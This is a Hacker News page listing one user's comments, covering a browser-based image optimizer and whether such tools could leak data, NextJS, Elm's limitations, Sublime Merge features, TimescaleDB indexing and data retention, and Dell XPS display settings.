Hacker News new | past | comments | ask | show | jobs | submit | neslinesli93's comments login

That's a very good point, thank you.

I could add some explanation on github and offer two kinds of optimization (lossless and lossy) and add a quality slider for the lossy one


is there a standard of proof these sites can provide about not sending data back to the servers? besides checking the network data, which it could delay to another visit or obfuscate easily


I don't know, sorry.

I mean, you can be completely sure that the website works offline by unplugging the cable/turning off your wifi connection after it's completely loaded. But that's just a functional test, not something you can expect users to do during a normal browsing session


thats not enough, it can send it in the next connection. unless you want to load a site once, and never connect your computer to the internet ever again.


This is something the web platform is missing.

I'd like some API for a page to load, then become "offline". Then I can use it, and have the browser block any attempts to send/receive data from anywhere except local storage.


How exactly could it obfuscate it? You can see every request in its entirety and if you see a request that you can't read, that's already enough reason to not use it. As for delaying it, it would have to store it somewhere like localStorage, which is just as easily inspectable.

If you're worried about that, loading it in a private window and switching to offline mode, then closing it after you're done makes any exfiltration impossible.


A service worker could send it after the tab is closed.


its easy to hide from network inspection


If you're this concerned that the app might delay sending until later, I would probably suggest you just use ImageMagick or GraphicsMagick locally instead. I use it all the time for processing photos. If you want to clean exif data look at exiftool. It's in most repos.


yeah thats what i do, but i wanna be able to use services like this


Thank you :)

My initial plan was to replicate the functionality of tools like tinyjpg, thus just offering users a simple interface with good defaults. But I already had in mind the lossy/lossless re-encoding functionality, as well as the quality slider, which I plan to add sometimes in the future


Shameless plug, but I'm playing with Rust these days and I've setup a small POC: https://github.com/neslinesli93/hits-rs

Hopefully actix-web is a bit more resilient than Python!


In my (quite small) experience, developing with NextJS has been a breeze.

Some time ago I've decided to rewrite a landing page, written in Node + EJS templates + JQuery, using some kind of static generator. I have always heard good things about NextJS as well as Gatsby, but after some exploration I decided to go with NextJS, since Gatsby seemed more complex and better suited for CMS/other complex websites rather than a simple, light landing page.

The developer experience has been amazing. Plus, I've found an awesome library[0] for dealing with i18n, which completely absorbed the pain of dealing with multiple languages: getting SEO right, make links work, and so on.

Plus, pairing NextJS with PReact, brought my pages first-load size down to ~40KB (external resources excluded), which I didn't think it was possible for something built with React.

The only things that I missed from CRA-like apps were environment variables, which have been added with this release, and a good integration with third-party tools like eslint, typescript and prettier. I did not use typescript because it was just overkill for a simple landing, and I'm launching eslint by hand and in the CI, so I really miss how good the integration is when developing a normal React App bootstrapped with CRA (which has all of this awesomeness out of the box).

[0] https://github.com/vinissimus/next-translate


I'm currently using Elm at my day job, and I agree 100% with what you are saying.

Elm lacks extensibility, tooling, and documentation is not that great. The biggest pain point however is the people who run the Elm language. The design decisions they took hurt the language and the users a lot, breaking more and more with every version bump, restricting freedom and creating a walled garden that people are getting tired of.

What you say about JavaScript libraries is not 100% technically correct though. You can still access any native JS library you like, but you got to use ports. You can't hook into native elm functions bound to the global scope, but that's always been a very shady, undocumented and terrible thing to do.

The following reasons are what, I believe, really ruined elm adoption:

1) You can't create so called effect modules (like the http module of the standard library, and so on) if your package is not within the `elm` namespace.

2) As a company, you can't have shared, common elm modules if they are not published in the Elm package public registry. You can't install a package from GitHub without resorting to ugly hacks like ostracized elm package managers written in Ruby.

3) No development timelines, no companies publicly endorsing or using Elm to develop open source libraries besides the one where the language founder is employed.

I've never tried anything purely functional and typed to do frontend programming, so I'd like to hear if Purescript, ReasonML, etc share the same struggles with Elm


Always liked this post on Elm in production: https://www.pivotaltracker.com/blog/Elm-pivotal-tracker


It seems like the fix is in the making, and could be out in a few weeks.

Meanwhile, there is a forked version of the compiler with a hotfix for the debugger that works for most applications, even medium and large ones: https://github.com/elm/compiler/pull/1850


Awesome stuff, I'm loving it! I guess it's time do finally ditch GitKraken and SourceTree (:

I have a couple questions: - Do you have a plan to add git flow integration? And what about interactive rebases? - Please, please, allow free users to use dark theme as well! Sublime Text license was really great, why add such a small change?


Interactive rebase is absolutely coming (you can already edit commit messages and squash commits). UI support for Git Flow is going to depend on user feedback. I expect we will eventually, but even if not, we will be adding a plugin API, and it would naturally be doable via that.


Also, if you can rename all these opaque commands to be more user friendly :) even if this means adding more commands, I think it’s worth it. “Rebase” should be the first victim


Alas, one of our key principles is to not hide or rename anything in Git, so your knowledge from using Git on the command line transfers to and from Sublime Merge.


Are UI translations possible? If so, and someone can replace "Rebase" in the translation with another word, it's possible.

Bonus if the other strings contain placeholders e.g. "Interactive #{rebase|ucfirst}" to reduce the changes.

Bravo Jon, SourceTree has been sucking more and more recently, and as a Windows & Mac user I'm looking forward to trying this out.


There are so many types of very different rebase that I don’t think a simple translation would simplify the flow


Fair enough, maybe think of this as an optional feature for the future :) you must be really good with git but most people need to google how to do something everytime they want to do something more complicated then a merge


Personally, I believe letting every UI or toolchain compatible with git settle on their own phraseology for identical operations will lead to more issues than we currently have. Git is definitely complex, flags unclear, and commands awkward from time to time. Now, imagine trying to figure out the meaning of commands when they don't even translate equivalently across tooling? Sounds like a nightmare to me. I appreciate the effort to stay consistent with git itself.


How do you squash commits?


Right click a commit, and it's under the Edit Commit sub-menu


I have to pay for a dark theme? seriously? You should sell features like in-app-purchases then. $1.99 for this, $.99 for that, etc. $80, $99.... man your software is really really good, but when there's free competitors that are on par w/yours, those prices are steep imo. I know you've heard all this before... guess the hundred dollar dark theme got me


I might be inclined to agree with you, but it seems to me it's not a $99 dark theme as much as it is an unrestricted trial version that you should buy for $99 even if you continue using it with the light theme.

I think it's actually good of the developers not to impose DRM, but it seems that confused you into thinking this is free software?


> Do you have a plan to add git flow integration?

What does that mean? Isn't git flow just a branching model?


Yes, but one that's popular enough for there to be special commands for it in most git clients, including the one in the ubuntu repos.

git flow init = git init; git branch develop; git checkout develop; ```

``` git flow feature start add login page = git branch develop feature/add-login-page; git checkout feature/add-login-page; ```

``` git flow feature finish = git checkout develop; git merge develop feature/add-login-page; git branch -d feature/add-login-page; ```


Wonderful analysis, I was waiting for something like this to come out!

Recently, I've gone through this very same choice and ended up with vanilla PostgreSQL (Timescale was not mature enough).

[Shameless self plug] You can read some of the details here: https://medium.com/@neslinesli93/how-to-efficiently-store-an...


One point of clarification for readers of @neslinesli93's post is that Timescale does not create "heavy" indexes.

We do create some default indexes that PostgreSQL does not, but these defaults can be turned off. We also allow you to create indexes after bulk loading data, if you want to compare apples-to-apples.

But to be clear, the indexes Timescale creates are the same, or can often times be cheaper, than PostgreSQL (remember, TimescaleDB is implemented as a PostgreSQL extension). We're always happy to help people work through proper set up and any implementation details in our Slack community (slack.timescale.com).


Hi, thanks for the tips!

As I mentioned inside the article, I tested last year version of TimescaleDB (July/August 2017) and that was my experience with it out of the box.

I am really impressed by all the progress you've made, and hopefully I'll consider TimescaleDB as my first choice on the next iteration of the product I'm working on.

Now, I'm skimming through the docs[1] and as I understand, create_hypertable is called before all the data is migrated, thus all TimescaleDB indexes are already present during the migration. What is the way to create indexes after data migration?

[1] https://docs.timescale.com/v0.11/getting-started/migrating-d...


Hi @neslinesli93, it's quite easy:

(1) Call create_hypertable with default indexes off (include an argument of `create_default_indexes => FALSE`) [1]

(2) Then just use a standard CREATE INDEX command on the hypertable at any time. B-Tree, hash index, GIN/Gist, single key, composite keys, etc. This DDL command will propagate to any existing chunks (and create them) and will be remembered to so any future chunks that are automatically created will also have these indexes [2]

[1] https://docs.timescale.com/latest/api#create_hypertable

[2] https://docs.timescale.com/latest/using-timescaledb/schema-m...


>What is the way to create indexes after data migration?

You can migrate the data and then do the normal PostgreSQL `CREATE INDEX` syntax to create the indexes on the hypertable. It's not an option to create_hypertable or anything, but that's how you would achieve it.


How does Timescale solve the problem of retention. In InfluxDB, old data is thrown out at every tick as the retention window continuously rolls. In the world of Postgres, wouldn't this mean an explicit cron-like DELETE of rows all the time?


I believe that since timescale creates time based partitions, you can expire old data by dropping old chunks: https://docs.timescale.com/v0.11/api#drop_chunks


Did they solve the not-so-well-known problem of Content Adaptive Brightness Controll (CABC) not being disableable for FHD models? People do not speak very much about this, but for me it's actually a game changer. I was so close to buy one of those new xps 13" during holiday sales, but when I read that they do not simply allow you to disable the CABC option on FHD models (whereas you can on QHD models by updating the BIOS), I completely changed my mind on Dell models - actually, CABC was just part of the reason, the others being coil whine, quality control issues, no sane ports...


There appears to be an official Dell tool to disable CABC on the FHD now. I'm happy about that. Going to give it a run in the morning.

https://github.com/advancingu/XPS13Linux/issues/2#issuecomme...

http://www.dell.com/support/home/us/en/04/drivers/driversdet...


Asking for an invite as well. Email in my profile. Thank you John, or whoever has any invites left!


email NOT in your profile...


I'd appreciate an invite too, if you have one - vmarsi75-hn at yahoo dot com. Thanks!


Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: